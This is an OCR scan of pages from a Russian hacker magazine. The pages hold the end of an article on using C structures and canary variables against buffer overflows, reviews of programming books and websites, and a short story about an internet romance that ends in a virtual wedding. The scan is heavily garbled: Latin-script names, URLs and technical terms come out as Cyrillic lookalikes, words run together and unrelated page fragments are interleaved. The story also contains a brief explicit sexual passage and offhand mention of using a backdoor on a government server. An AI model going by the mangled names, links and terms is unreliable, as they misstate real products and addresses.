компиляторы легко определяют эффектив- 
ный адрес элементов структур без проме- 
жуточных вычислений. А вот засылка мно- 
жества аргументов в стек изрядно тормозит. 
Кроме того, предложенный метод позволяет 
безболезненно менять прототипы функций 
(в том числе и публичных). Скажем, захоте- 
лось нам добавить к функции, выводящей 
изображение спрайта на экран, новый ар- 
гумент — коэффициент прозрачности. В 
классическом случае мы ничего не можем 
сделать, поскольку это потребует измене- 
ний во всем проекте, и коллеги из соседних 
отделов нас тут же изжарят на медленном 
огне. А в случае со структурами можно до- 
бавлять сколько угодно аргументов. Ста- 
рый код их «не замечает», зато новый — да! 



А это значит, что при переполнении одного 
из буферов атакующий может воздейство- 
вать на указатели р и з со всеми вытекаю- 
щими отсюда последствиями. Напротив, в 
структурах размещение элементов в памяти 
всегда совпадет с порядком их объявления! 




03 



СТРУКТУРЫ 
В БОРЬБЕ С ПЕРЕПОЛ- 
НЯЮЩИМИСЯ БУФЕ- 
РАМИ 

Существует множество защитных меха- 
низмов типа Зіаск-СиагсІ или Зіаск-ЗНіеІсІ, 
но все это — детские игрушки, не спо- 
собные остановить атакующего. Протек- 
тор Рго-РоІісе, зародившийся в недрах 
японского отделения ІВМ ( ѵѵѵѵѵѵ.гезеагсіі. 



Здесь сапагу_1 и сапагу_2 — магические 
переменные, инициализируемые случай- 
ным образом при входе в функцию и прове- 
ряемые перед выходом из нее. Если же они 
вдруг оказались искажены, значит, один из 
буферов был переполнен, и адрес возвра- 
та, возможно, смотритнавредоносныйзНеІІ- 
код. Поэтому вместо возврата мы заверша- 
ем программу в аварийном режиме (самое 
простое, что можно сделать) или передаем 
управление на специальную функцию, со- 
храняющую несохраненные данные. В об- 
щем, структуры — это сила! И-И 
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ДМИТРИЙ «ОЕМ@І\І» ТАРАСОВ 




іші. 

2-е издание 



«МІСВ050РТ АЦО.ЫЕТ 2.0 ДЛЯ ПРОФЕССИОНАЛОВ» 



«ВНУТРЕННЕЕ УСТРОЙСТВО МІСРЮЗОРТ 



КЛАДЕЗИ 
ИНФОРМАЦИИ 

актуальные книжки и сайты 

ПО ПРОГРАММИРОВАНИЮ 



Нсап-ііР- идгіонагл! ?а інітп анЦнЪіЬ* Д^ПМ 
г грсі.’Ні с аа: ?ѵ:р.:^ ЦАпйвдп 



ПУТЬ К СОВЕРШЕНСТВУ ТЕРНИСТ И ЛЕЖИТ ЧЕРЕЗ НЕПРЕРЫВНОЕ СА- 
МООБРАЗОВАНИЕ. СПЕЦИАЛЬНО ДЛЯ ТЕБЯ МЫ ПЕРЕЛОПАТИЛИ ГОРЫ 
БУМАЖНОЙ ЛИТЕРАТУРЫ И ГИГАБАЙТЫ ЭЛЕКТРОННОГО СЛИВА, 

А В ЭТОТ ОБЗОР ПОПАЛИ ЛИШЬ ТЕ КНИГИ, КОТОРЫЕ ОСОБЕННО НАМ 
ПОНРАВИЛИСЬ :). 






Внутреннее устройство 

Місгок-ІѴ 

ѴѴІІНІ0Ш8: 

Міпйошк 8егоеГ 2003. 
ШіпеКіѵѵз ХР и Шп0ошз 2000 



Мі егозой 

АРО^ЕТ 2.0 



Ч^іимчас 

НЗІЦІ н НГ 



!.! Руг.е Н.-ІШ1 ,іч, Д Свис ион 



— САХИЛ МАЛИК 



ѴѴІЫЦОѴѴЗ» — М. РУСИНОВИЧ, Д. СОЛОМОН 



«ІІМІ_» — Г. БУЧ, А. ЯКОБСОН, ДЖ. РАМБО 



ГДЕ ВЗЯТЬ: КНИЖНЫЕ МАГАЗИНЫ 



ГДЕ ВЗЯТЬ: КНИЖНЫЕ МАГАЗИНЫ, (ШЖВЦ 



ГДЕ ВЗЯТЬ: КНИЖНЫЕ МАГАЗИНЫ, 020ІЧ.ВІІ 



ару месяцев назад я решил уз- 
нать, какие же навыки наиболее 

I I востребованы в среде .ЫЕТ-раз- 

работчиков. Поместив пару резюме на со- 
ответствующих сайтах, я некоторое время 
получал в день несколько звонков от потен- 
циальных работодателей, и практически 
каждый из них требовал умения работать с 
базами данных на основе технологии АЭО. 
ЫЕТ. Это неудивительно: работа с ними 
всегда была неотъемлемым звеном в рабо- 
те корпоративного механизма. 

В книге Сахила Малика, имеющего статус 
МУР, как раз описывается работа с пос- 
ледней версией нэймспейса Зузіет. Эаіа, 
образующего костяк технологии АЭО. ЫЕТ. 
Книжка написана понятным и доступным 
языком, и если ты имеешь представление о 
платформе .ЫЕТ, то без проблем вникнешь 
во все нюансы работы с БД, несмотря наус- 
трашающее словосочетание «для профес- 
сионалов» в названии. Что приятно, книгу 
издали у нас спустя лишь небольшое время 
после ее написания, и все рассматрива- 
емые примеры написаны в ѴЗ. ЫЕТ 2005 и 
для ЗОБ Зегѵег 2005 (есть также фрагменты 
кода и для Огасіе). Кроме того, в отличие от 
большинства буржуйских книг по .ЫЕТ, код 
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представлен в двух вариантах: для С# и ѴВ 
.ЫЕТ. В общем, книга достойная. 
Значимость этой книги сопоставима с ра- 
ботами Эндрю Таненбаума, посвященным 
разработке и устройству операционных 
систем (я думаю, ты понял о каких работах 
идет речь). Как ни парадоксально, в книге 
нет ни строчки кода, но при этом она жиз- 
ненно необходима программисту, зани- 
мающемуся кодингом под ѴѴіпбоѵѵз! В ней 
рассмотрены вопросы построения и функ- 
ционирования ОС ѴѴіпбоѵѵз Зегѵег 2003, ХР 
и 2000, включая модель защиты ѴѴіпбоѵѵз, 
внутренние структуры данных и алгорит- 
мы, внутреннее устройство КІТРЗ, анализ 
аварийных дампов памяти, реестр и многое 
другое. По полноте охвата материала книге 
нет равных, при всем том что по ходу повес- 
твования рассматриваются практические 
примеры исследования внутренностей 
винды с помощью специальных утилит, раз- 
работанных авторами. 

В общем, если ты хочешь досконально разби- 
раться в устройстве и принципах работы ОС 
семейства ѴѴіп2к, эта книга — клад для тебя. 

Я думаю, ты знаешь, что существует 3 ос- 
новных типа приложений: классические 
(стационарные), распределенные и ѵѵеЬ 



— приложения. Вото последних и идет речь 
в этой книге. Технология А^Х достаточно 
нова, и внятных источников информации по 
этой теме на русском немного. Данная ра- 
бота является, пожалуй, первой книгой, где 
про связку «асинхронный ^ѵаЗсгірі + ХМЬ> 
рассказывается достаточно подробно. 
Приводится много примеров кода, который 
несет реальную смысловую нагрузку. Уде- 
ляется внимание вопросу проектирования 
ПО. Есть целая глава, посвященная безо- 
пасности веб-приложений. 

Тебе никогда не приходилось разбираться в 
чужих проектах? Видел там всякие непонят- 
ные диаграммы классов, состояний, развер- 
тывания? Это, дяденька, ІІМЦ универсальный 
язык моделирования, цель которого — стан- 
дартизация процесса разработки ПО. Данная 
книга написана авторами ІЛѴІІ_ и представляет 
собой исчерпывающий справочник, который 
поможет разбираться тебе не только в чужих 
проектах, но и в примерах большинства совре- 
менных книг, посвященным новым объектно- 
ориентированным технологиям! Практичес- 
ки ни одна работа, посвященная, к примеру, 
программированию под ЗутЬіап не обходится 
без построения этих самых диаграмм, причем 
знание ІІМІ_ при изучении материала предпо- 
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СЕТЕВЫЕ ТЕХНОЛОГИИ 

МОБИЛЬНЫЕ СООБЩЕНИЯ 

Службы К ТЁАкОЛйГНи 5М5 ЕМ5-ММ5 




МОБИЛЬНЫЕ СООБЩЕНИЯ. СЛУЖБЫ И ТЕХНОЛО- 
ГИИ ЗМЗ, ЕМ5 И ММ3» — ГВИНЕЛЬ ЛЕ-БОДИК 
ГДЕ ВЗЯТЬ: КНИЖНЫЕ МАГАЗИНЫ, 020М.ВУ 




«АиАХ В ДЕЙСТВИИ» —ДЕЙВ КРЕЙН, ЭРИК ПАСКА- 
РЕЛЛО, ДАРРЕН ДЖЕЙМС 



С#» — РАІЛУАО, ЭАѴЮ ОІІВАІЧТ 

ГДЕ ВЗЯТЬ: АМА20ІЧ.С0М, 02СМВІІ, ЕМ1Л.Е 



ГДЕ ВЗЯТЬ: КНИЖНЫЕ МАГАЗИНЫ, 020ІЧ.ВІІ 



лагается по дефолту. Так что, если не хочешь 
отстать от современных принципов создания 
ПО, советую тебе изучить этот вопрос, а эта 
книга тебе поможет. 

С каждым месяцем на рынке появляется все 
больше систем, которые используют в качес- 
тве одного из звеньев работу с мобильными 
сообщениями. Чего стоят только системы из- 
вещения по ЗМ5 об угоне машины или посылка 
фото с места наблюдения посредством ММ3. 
Если ты собираешься заниматься мобильным 
хаком, то обязан разбираться в механизмах 
работы подобных систем. 

Данная книга уже год остается самым ис- 
черпывающим описанием этих технологий. 
Рассматриваются вопросы от организации 
сетей ОЗМ до формата кадров. Материал 
изложен грамотным техническим языком и 
на хорошем уровне. 

Как ни прискорбно, но книги по всем новым 
технологиям выходят в России с большим 
опозданием. В частности, особенно туго при- 
ходится разработчикам для РоскеіРС — книг 
по программированию для наладонников 
на русском языке практически нет. Поэтому 
если ты встал на скользкую дорожку кодера 
для мобил — учи английский. 

Данная книга подробно описывает процесс 



создания программ для платформы ,І\ІЕТ СЕ, 
ориентированную на использование в совре- 
менных КПК, коммуникаторах и смартфонах. 
Эта технология создавалась в рамках общей 
.ЫЕТ-эпопеи, поэтому процесс создания про- 
грамм аналогичен программированию под 
настольную .І\ІЕТ. Тем не менее, отличия есть, 
и они описаны в данной работе. Приводится 
также описание платформы ѴѴіпсІоѵѵз СЕ и ее 
свойств. Естественно, дается краткий обзор 
.ІМЕТ в целом. Что приятно, в отличие от мно- 
гих подобных изданий эта книга наполнена 
не пространными рассуждениями вроде 
«как же надо писать софт для КПК?..», а впол- 
не конкретными рекомендациями по работе 
с разбором примеров. Кто сталкивался, тот 
поймет. 

□Опііпе 

Статья ^Подробный анализ структур данных" 
-Скотт Митчелл 

Адрес: ѵѵѵѵѵѵ.аоісІоіпеІги/ЕеагпРоіМеі/АІаогііІп- 
тз/29787.азрх 

Статья состоит из двух частей. Разбирается 
работа со структурами данных в .ІЧЕТ. Прочи- 
тав эту статью, ты поймешь (а может, и не пой- 
мешь), что же это такое Хэш, Очередь, Стэк, 
для чего они нужны и как с ними работать. 



Ветка форума В8&ІЧ „Сетщ сокетьц про- 
токолы" 

Адрес: Иир://гзбп.гиЛогит/?агоир=пе1\д/огк 
Здесь обсуждаются вопросы, касающиеся 
сетевого программирования. Встречаются 
как тривиальные, так и довольно интересные 
вопросы. Тематика обсуждения самая разно- 
образная: от работы с ОрепЗЗІ- до каскади- 
рования прокси-серверов. 

Сборник статей по Збагеѵѵаге. 

Адрес: МірѴ/гзсІп.ги/зиттагѵ/ІЗОб.хтІ 
Неплохая подборка качественного матери- 
ала. Статьи посвящены тонкому искусству 
продажи своих прог. 

Сайт автора книги ^Ѵіпсіоѵг Ыегпаіг" Марка 
Русиновича 

Адрес: ИДр://зѵзіп1егпаІз.сот/ 

Большое количество аналитических матери- 
алов, касающихся внутреннего устройства 
ѴѴіпсІоѵѵз, включая персональный блок Марка 
Русиновича. Кроме того, на сайте можно ска- 
чать утилиты, предназначенные для углублен- 
ной работы с виндой и использующиеся при 
разборе примеров в книге «Внутреннее уст- 
ройство МісгозоЙ ѴѴіпсІоѵѵз». Весь материал, 
естественно, — на английском, но это один из 
ресурсов, ради которого стоит его выучить. ІНІ 
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«СЫН» Башкатов 




теріу ^оіѵзіг^ 



нѳ было 27 лѳт, и меня вполне можно 
было назвать типичным предста- 
вителем компьютерного века, так 
как практически все свое время я проводил 
дома за монитором. Работа напрямую связана 
с интернетом, все друзья обитали на сетевых 
форумах, новости узнавал из ньюслент, раз- 
влечения опять же находил в сети. Конечно, 
иногда приходилось ходить в магазин за хле- 
бом, или, к примеру, кинуть на счет вебманей, 
но относился я к этому не иначе, как к отвлека- 
ющим от основной жизни вещам. И, по правде 
сказать, меня такая жизнь вполне устраивала. 
В конце концов, что хорошего в этом реаллай- 
фе? Постоянные теракты кругом, недовольные 
рожи продавщиц, менты, пасущие мигрантов у 
метро, гопники и скинхеды. . . Была б моя воля, я 
бы полностью переселился в сеть. Хотя я себя и 
так ощущал целиком там, плавая в бескрайнем 
океане сайтов, как рыба в море, и постоянно от- 
крывая что-то новое. 

Друзья были во многом похожи на меня. У неко- 
торых, правда, имелась оффлайновая работа, 
у одного даже — семья, но я их считал своими 
людьми, ведь никто меня не понимал так, как 
они. Примерно раз в месяц мы собирались в 
одной малоизвестной московской кафешке 
зачашечкой пива. Эдакая компашказаросших 
фриков. Но я все же больше предпочитал наши 
посиделки в ІЯС. Что ни говори, асетевоеобще- 
ние и проще, и увлекательнее, и перебивать не 
нужно, и придумать умную мысль проще, когда 
сидишь не где-нибудь в шумном подвале, а за 
родным компом. 

И вот однажды, когда мы сидели на этом самом 
канале, речь зашла о тетках. Это у нас была не 
самая популярнаятемадаккакмы единогласно 



считали: тетки — зло и от них все беды. Просто 
все остальные темы зашли в тупик, да и вопрос 
«Что злее — тетки или ламеры?» оказался жи- 
вотрепещущим. Все было здорово, пока Леха 
не решил поделиться с нами своими похожде- 
ниями. Он рассказал о студенческих годах, о 
том, как бегал петь серенады под окна какой-то 
дуре, отом, каку нихбыловсехорошосначалаи 
все плохо потом. Мы офигели оттаких открове- 
ний, но, наверное, с них все и началось. Потому 
что именно в тот момент я подумал, каково это 
быть вместе с кем-то. 

Вы не подумайте, я женщин тогда не только на 
карти н ке видел . Бывало, даже ухажи вал . Давно 
этобыло.вшколееще.Мыснейзаоднойпартой 
сидели, и она мне всегда давала списывать, а я 
еедо дому провожал. . . Впрочем, небудем воро- 
шить прошлое. 

Задумался я об откровениях Лехи всерьез, 
можно сказать, что-то во мне тогда переверну- 
лось. Ну что я все сам да сам. Я даже гордился 
тем, какой я волк-одиночка, и никто мне был не 
нужен. Может быть, я просто обманывал сам 
себя? Выяснить это можно было только одним 
способом, и я принялся искать. 

Где-то я читал, что возлюбленную некоторые 
ищут всю жизнь. Наверное, тогда просто не 
было интернета. Первым делом я, разуме- 
ется, зашел на один из популярных сайтов 
знакомств. Выбор там был приличный, только 
тетки какие-то. . . В общем, не в моем вкусе. Да и 
большинство в графе «Цели» вписали в числе 
прочего «секс». Я хоть и не герой-любовник, но 
прекрасно понимал, что это за девицы и чего от 
них ожидать. Скромная, симпатичная, нетре- 
бовательная, умеющая готовить, стирать, уби- 
рать, в меруумная и шарящая в компах — вотон, 



мой идеал. Но оказалось, из этих пунктов пре- 
тендентки максимум соответствовали двум. 
Да и ктем фигдостучишься. Короче, забил я на 
своднические сайты, решил прошвырнуться 
по популярным чатам. Атам раздолье: Кисочки, 
Ромашки, Снежинки, М@лышки, Принцесски, 
Лисички и даже Богиня! С Богиней мы как раз 
и сошлись интересами довольно быстро. Тет- 
ка оказалась не промах: работала в какой-то 
компьютерной фирме, дизайнила веб-сайты, 
да и мозгами, сразу видно, Бог не обделил. По- 
шушукались мы, я сразу понял: это — ОНА. А 
деваха вдругзаявляет: «Пошли пиво пить!». Я от 
неожиданности опешил, предложил обменять- 
ся для начала фотами. «Зачем, — говорит, — на 
месте узнаемся». На следующий день пришел 
я без опозданий к памятнику, где договорились 
встретиться, даже цветы купил. А там мужик 
какой-то. Стоит, сука, улыбается. Оказалось, 
Борис в том чате просто развлекался, а пивка 
решил со мной попить, потому что «мужик я, 
вроде, нормальный». Ничего так посидели, лит- 
ров 10 вдули. Но после этого случая в поиске я 
разочаровался. Может, мне на роду написано с 
монитором в обнимку жить?Такя тогда думал. 
Счастье на меня свалилось нежданно-нега- 
данно. С момента моего захода в чат прошло 
несколько недель, я уже забросил мысль найти 
себе пару. И тот день я помню четко, как в чер- 
но-белом кино. Я выгребал спам из почтового 
ящика и обнаружил письмо. «Случайно наткну- 
лась натвой сайт и во многом узнала себя саму. 
Напиши мне, если будет желание пообщаться. 
Карина». 

Сайту меня был из разряда «ничего особенно- 
го» — обычная домашняя страничка, которую 
посещаюттолько друзья. Там я вкратце расска- 
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НИ КАРИНА, НИ Я РАНЬШЕ НЕ ЗАНИМАЛИСЬ ЭТИМ В СЕТИ. ХОТЯ МНЕ ВСЕГДА БЫЛО 



зал о себе, своем образе жизни и взглядах на 
сеть. Да, ясовершеннотвердо уверен, чтовско- 
ром времени не только я, а все человечество бу- 
детжить и общаться в сети. Вероятнее всего мы 
будем подключены напрямую, как в матрице, а 
может, просто изобретуттермокостюмы вирту- 
альной реальности. Мыслей на этот счету меня 
много, но ты ведь не об этом хочешь услышать? 
Карина... Это было или какое-то невообрази- 
мое совпадение, или знамение. Ведь это мое 
любимое женское имя! Неужели какая-то жен- 
щинамогла, каки я, просиживать сутками перед 
монитором, считать для себя интернет важнее 
реаллайфа? Или это была чья-то злая шутка? 
К письму прилагалась маленькая картинка, с 
которой на меня смотрели глаза. Почему-то я 
не сомневался, что эти глаза принадлежали ей. 
Светлые, бесконечно глубокие и втоже время с 
хитрецой. Я бы все тогда отдал, чтобы увидеть 
лицо владелицы этих глаз, но — увы. 

Я написал ей в тот же час и предложил встре- 
титься в одном из необъятных уголков сети, что- 
бы познакомиться поближе. Для этого я даже 
открыл ей свое секретное место, где сам любил 
изредка бывать. Этот канадский сайт отличал- 
ся от обычных чат-сервисов уникальной атмос- 
ферой — фоном играла мелодичная музыка, а 
интерактивная оболочка создавала ощуще- 
ние, как будто ты находишься на природе. Я вы- 
брал лесное озеро, создал приватную комнату, 
доступ к которой имелитолькомы вдвоем, и стал 
ждать. 

Я уже почти разочаровался ее увидеть, как 
вдруг послышался сигнал, и в комнате появи- 
лось знакомое имя. «Привет, Карина!» — ска- 
зал я. «Привет!» — ответилаона. Чтобылодаль- 



ше, спросите вы? Я не буду приводить полный 
лог нашей беседы, скажу только, что это было 
самое увлекательное и романтичное общение 
к тому моменту моей жизни. Наше первое сви- 
дание. Именно так, неважно, что вода в озере и 
облака были компьютерными, а эмоции мы вы- 
ражали смайликами, главное — нам былохоро- 
шо вдвоем. Карина полностью разделяла мои 
мысли о том, что жить в сети — ничем не хуже, 
чем жить в реальности. И ей, так же, как и мне, 
наскучили серые улицы, вместо которых она 
предпочитала яркие лабиринты информации. 
Мы прообщались до утра, и когда, уже попро- 
щавшись, я ложился в постель, подумал, что 
приобрел что-то очень важное. 

С тех пор мы стали почти все время проводить 
вместе. Мы постоянно общались, все время 
выбирая для свиданий новые, порой безумно 
экстремальные места. Однажды я воспользо- 
вался подаренным знакомым хакером бекдо- 
ром в сети крутого правительственного серве- 
ра, и мы с Кариной организовали там уютную 
комнатку для болтовни. В любой моментнас мог 
засечь админ, но это только добавляло остроты 
ощущениям. Мы установили специальную про- 
грамму, чтобы в любой момент видеть, на каком 
сайте кто находится. Дарили друг другу трога- 
тельные виртуальные подарки. Я даже выкупил 
и подарил ей домен с ее именем ! Со временем я 
стал ощущать, что во мне проснулось какое-то 
ранее неизведанное чувство. Я постоянно ду- 
мал о ней и, хотя незнал, как Карина выглядела, 
был уверен, что в мире нет никого прекраснее. 
В какой-то моментя предложил ей встретиться. 
Поверьте, я ничего до этого так не боялся, как 
мысли о встрече с ней. И вместе с тем мне так 



этого хотелось... Но Карина сказала: «Стоит 
ли?Намхорошовсети и мы принадлежим этому 
миру. Стоит ли все разрушать?». Я много думал 
над ее словами, и, в конце концов, решил, что 
онаправа. 

Мы продолжали проводить огромное количес- 
тво времени вместе. Мои друзья удивлялись, 
куда я пропал, почему перестал заходить на 
ІВС. Я придумывал различные отмазки, но не 
раскрывал им свой секрет. Даже они вряд ли 
могли бы меня понять. 

Благодаря Каринеяузналоновыхуголкахсети, 
вместе с ней окунулся в миры Асйѵе ѴѴогІбз. Мы 
вместе бродили по виртуальным континентам, 
посетили древние Афины и Северный Полюс, 
слетали на Марс и окунулись глубоко в подвод- 
ные бездны. Иногда мы встречали случайных 
попутчиков в этих мирах, и часто они спраши- 
вали: «Вы муж и жена?». «В каком-то роде да», 
— отвечали мы и хитро перемигивались. 
Однажды Карина исчезла. Я просто проснулся 
и не застал ее в сети. Она не появилась нив тот 
день, ни на следующий. Почтовый ящик не от- 
вечал, наши укромные чат-румы пустовали, ин- 
тернет-пейджер показывал, что она оффлайн. 
Такого никогда еще не было. Конечно, иногда 
она ненадолго отходила от компа, но ее I Р всег- 
даоставался онлайн, и очень скоро онавозвра- 
щалась.Но2дня подряд без сети? Для насбыло 
проще обходиться без воды и пищи. 

Три дня я не находил себе места, задавая себе 
разные вопросы. Что с ней? Может быть, она 
устала от общения со мной и решила сменить 
провайдера, чтобы навсегда исчезнуть из моей 
жизни? Но в последние часы общения она это 
ничем не выдавала. А может, с ней случилось 
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что-то ужасное в реаллайфе? Хуже всего было 
то, что я ничего о ней не знал: ни телефона, ни 
домашнего адреса, ни даже фамилии. У меня 
был ІР, по которому я попытался ее найти, но 
московский провайдер наотрез отказался вы- 
давать информацию. Я не могзаснуть и ночами 
перечитывал логи наших разговоров, пытаясь 
найти в ниххоть какую-то двусмысленность. Но 
все безрезультатно. 

Она вернулась на четвертый день, и у меня 
словно гора упала с плеч. Оказалось, сгоре- 
ла материнская плата, и на восстановление 
потребовалось несколько дней. Карина при- 
зналась мне, что все это время скучала. В день 
ее возвращения мы выбрали один из самых 
пустующих миров АѴѴ — затерянный в океане 
необитаемый остров, мы стояли вдвоем на пес- 
чаном берегу, смотрели на закат и молчали. А 
потом я сделал ей предложение. Я знаю, это мо- 
жет звучать странно и смешно, но все было так 
естестве нно.имнедей ств ител ь н о хотел ос ь это 
сделать. Она просто ответила: «Да». 

Я раньше читал про виртуальные свадьбы в 
сети. Существуют даже виртуальные ЗАГСы, 
где выдают свидетельство, и молодожены об- 
мениваются виртуальными кольцами. Но для 
нас это было впервые. Карина пригласила в 
качестве свидетельницы подругу, я — Леху. 
Он, конечно, был настроен скептически, но 
решил «подыграть». Для него это была всего 
лишь игра, только не для нас с Кариной. На це- 
ремонию пришли также все мои компьютерные 
друзья, было еще несколько человек со сторо- 
ны невесты. Ведущая спросила нас, согласны 
ли мы жить душа в душу, в горе и радости, пока 
смертьнеразлучитнас.Авконцецеремониимы 



обнялись и поцеловали друг друга. Обычными 
смайликами, но я почти физически ощутил ее в 
своих объятиях. 

После церемонии бракосочетания мы все 
дружной толпой отправились на интерактив- 
ный развлекательный портал, где я выбрал в 
списке сервисов «грандиозную пьянку». Фон 
сайта превратился в изображение простор- 
ного ресторана, рядом со своей трехмерной 
фигуркой я увидел модельки друзей. Очень 
похожие на оригинал — каждый сам настроил 
внешность своего аватора. Карина в свадеб- 
ном платье выглядела настоящей королевой. 
У нее были раскосые карие глаза, совсем как 
на той фотке, темные волосы спадали на об- 
наженные плечи, а на лице играла улыбка. Мы 
сидели рядом друг с другом, слушали тосты 
гостей, принимали свадебные подарки. И с не- 
терпением ждали, когда пир закончится, и мы 
останемся одни, наедине друг с другом. 

Ни Карина, ни я раньше не занимались ЭТИМ 
в сети. Хотя мне всегда было интересно попро- 
бовать, но никак не представлялось удобного 
случая. Теперь все было по-другому. Моим по- 
дарком супруге на свадьбу стал построенный 
своими руками интерактивный дом, который я 
установил на сайте с ее именем. Доступ к нему 
был закрыт ключом, его я лично вручил своей 
жене. Дом я тщательно защитил от вторжения 
хакеров, здесь мы могли чувствовать себя в 
полной безопасности, не опасаясь ничего. Так- 
же дом можно было обустраивать виртуальной 
мебелью и аксессуарами, Карина могла даже 
пригласить гостей. Хотя в тот момент нам не 
нужны были ни аксессуары, ни гости. Мы зашли 
в «спальню», обнялись и некоторое время мол- 



ча стояли, глядя друг другу в глаза. Говорят, в 
первый раз испытываешь жуткую неловкость. 
Ничего подобного — мне было легко как никог- 
да. Я медленно снял с Карины платье, обнажил 
ее прекрасную грудь и, наклонив голову, кос- 
нулся ее губами. Все остальное происходило, 
как в мечтах. В смысле, все и так происходило в 
наших мечтах или даже фантазиях, но это был 
не просто эротичный чат. Мы чувствовали эту 
связь. Мнесложнообъяснить, скажутолько, что 
кончил я не только в сети, и не один раз. Карина 
оказалась страстной женщиной и не отпускала 
меня от себя всю ночь. 

Обычно после свадьбы молодоженам полага- 
ется романтическое путешествие. Раз мы уже 
обвенчались в сети, то решили не нарушать 
традицию, тем более в инете пол но агентств, ор- 
ганизующих для туристов виртуальные туры. 
Нужнотольковыбратьстрану.итебедадутгида, 
который следует по указанному маршруту с ка- 
мерой, изображение с которой передается в 
реальном времени натвой компьютер. Самосо- 
бой, чем дал ыше находится место и чем опаснее 
маршрут, тем выше цена за удовольствие. Мы 
дол го обсуждал и, кудаотправиться. Каринехо- 
телось посетить экзотические саванны Афри- 
ки, я предлагал Таиланд. В итоге остановились 
на городе-мечте Остапа Бендера — Рио де Жа- 
нейро. Тем более там как раз начинался знаме- 
нитый карнавал. Возможности интерактивного 
гидапозволяли объединять компьютеры для пу- 
тешествия вдвоем, так что мы с Кариной могли 
сразу обсудить увиденное. Оператор, которого 
звали Мигель, нам попался очень профессио- 
нальный. Онхорошознал город и знакомил нас 
со всеми достопримечательностями. Если нам 
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ДЛЯ ОСУЩЕСТВЛЕНИЯ ПЛАНА ПОТРЕБОВАЛАСЬ ПОМОЩЬ ЗНАКОМОГО ХАКЕРА 
НЫМИ В БЕРЛИНЕ ЛАЙВ-КАМЕРАМИ. 



хотелось остановиться и рассмотреть что-то 
поближе, я сообщал ему об этом по ѴоІ Р, и он да- 
вал увлекательный экскурс о предмете нашего 
внимания. Нам даже удалось поговорить с мес- 
тнымижителями — Мигель выступал в качестве 
переводчика. Тур по Рио продолжался 5 дней, 
за это время мы побывали на пляже Копакаба- 
на — излюбленном месте для встречу бразиль- 
цев, прошлись по известной улице Атлантике, 
славящейся своими роскошными отелями, 
поднялись на гору «Сахарная голова», посмот- 
рели насимвол Рио — статуюХриста, — возвы- 
шающуюся на пике горы Корковадо, отдохнули 
в Ботаническом парке, где собраны более семи 
тысяч растений со всего мира, не обошли вни- 
манием Музей современного искусства. Но, 
конечно, больше всего впечатлений оставил 
карнавал. Праздничное шествие одетых в кра- 
сочные костюмы людей, полуобнаженные тан- 
цовщицы, огромные марионетки разныхформ, 
колонна барабанщиков, отбивающих единый 
ритм — все это сплеталось с незабываемой 
музыкой и атмосферой, создавая фееричес- 
кое зрелище. Мы ощущали, как будто на самом 
деле находились там, и Мигель всячески помо- 
гал нам усилить эффект присутствия. А когда 
прощались с этим дружелюбным коротышкой, 
он научил нас нескольким полезным бразиль- 
ским фразам. 

Когда вернулись в наш уютный домик, мы с Ка- 
риной сошлись во мнении, что возможности 
сети поистине безграничны. И только в онлайне 
человек получает полную свободу. 

Мы продолжали жить как семейная пара. У нас 
появился общий кошелек, и Каринатеперь мог- 
ла тратить по своему усмотрению мои деньги. 



Во всех анкетах, которые Кариназаполняла, 
она подписывалась моей фамилией. Вирту- 
альный секс стал обычным делом по ночам. 
Мы часто экспериментировали и пользо- 
вались опубликованными фантазиями дру- 
гих авторов. Таким образом, наша сетевая 
половая жизнь была совсем не скучной, 
а разнообразной. Если раньше я по всем 
вопросам консультировался с друзьями, то 
теперь лучшим советчиком для меня стала 
жена. Иногда я просто поражался ее женс- 
кой мудрости. 

Стала ли моя жизнь лучше после знакомс- 
тва с Кариной? Тогда я был уверен навер- 
няка: я настолько к ней привык, что не мог 
представить, как раньше жил один. Да, я 
по-прежнему сидел целыми днями за своим 
компьютером, но ведь важно не это, ато, что 
ты чувствуешь изнутри. 

Я не рассказывал ей о своем прошлом, она 
мне не говорилао своем. У нас было столько 
тем для общения, что просто не было нужды 
заполнять паузы откровениями о детстве и 
юности. Зато мы часто говорили о будущем. 
Карина один раз в шутку завела разговор о 
ребенке. Я не сомневался, что можно реа- 
лизовать и это желание, но мы не спешили 
— в конце концов, мы поженились совсем 
недавно. Тем не менее, вскоре после этого 
разговора я преподнес жене новый пода- 
рок. Это была миниатюрная домашняя со- 
бачка — что-то вроде тамагочи, но более 
продвинутый, требующий большего к себе 
внимания. Карина назвала его Точи, и песик 
наудивление быстро сдружился с хозяйкой. 
Питомца можно было выгуливать на просто- 



рах интернета, и он судовольствием бегал по 
страничкам сайтов, озвучивая свои эмоции 
веселым лаем. 

Я не могу сказать определенно, почему это сде- 
лал. Ведь мне всегда хватало общения с женой, 
да и друзья мне всегда были рады, хоть я и захо- 
дил на наш старый канал все реже. Наверное, 
простозахотелосьотвлечься, поэтому и оказал- 
ся в «Чате одиноких сердец». Я даже не пытался 
скем-тозавязатьзнакомство,Линдапригласила 
меня в приватную комнату сама, и по первым же 
фразам я догадался, что все это она проделыва- 
ла не один раз. А может не она, а он — еще свежи 
были воспоминания о старом знакомом Борисе. 
Слово за слово, разговор перешел в сексуаль- 
ное русло. После времени, проведенного вмес- 
те с Кариной, я считал себя искусным виртуаль- 
ным любовником, но Линда просто поразила 
своей бурной фантазией. Что она только не вы- 
творяла, какими только эпитетами не пользова- 
лась! На время чат-сессии я предусмотрительно 
блокировал входящий трафик нашей семейной 
программы, так что жена не могла ничего узнать. 
Но после встречи с Линдой я почувствовал стыд. 
Ведь я изменил Карине! Пусть не в реале, пусть 
моей партнершей была неизвестная личность с 
женским именем, но всеми мыслями я был с ней, 
и что лукавить, мне это нравилось. 

Правильно говорят, женщина чувствует обман 
за версту. На следующий день Карина стала 
расспрашивать, что со мной не так, почему я 
«изменился». Я только отнекивался, но жена 
продолжала свои расспросы. В конце концов, 
мне это надоело и я, не прощаясь, вышел в оф- 
флайн. То был первый раз, когда мы ночью не 
были вдвоем. 
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И УСЛУГИ НЕМЕЦКОЙ КОНТОРЫ, ВЛАДЕЮЩЕЙ НЕСКОЛЬКИМИ УСТАНОВЛЕН- 



На следующий день Карина закатила истери- 
ку. Онаписалакапсом, ставилагневныесмай- 
лики, говорила разные неприятные вещи. 
Оказывается, каким-то образом она узнала, 
где я был днем ранее и, хотя не моглаточно оп- 
ределить, с кем я общался и насколько плотно, 
подозревала, что простым общением дело не 
ограничилось. 

Мы никогда до этого не ссорились, и я очень 
сильно переживал. Отчасти потому, что сам 
был во всем виноват. Каринаизменилапароль 
на вход в наш виртуальный дом, а на мои емей- 
лы приходил автоматический ответ: «Возвра- 
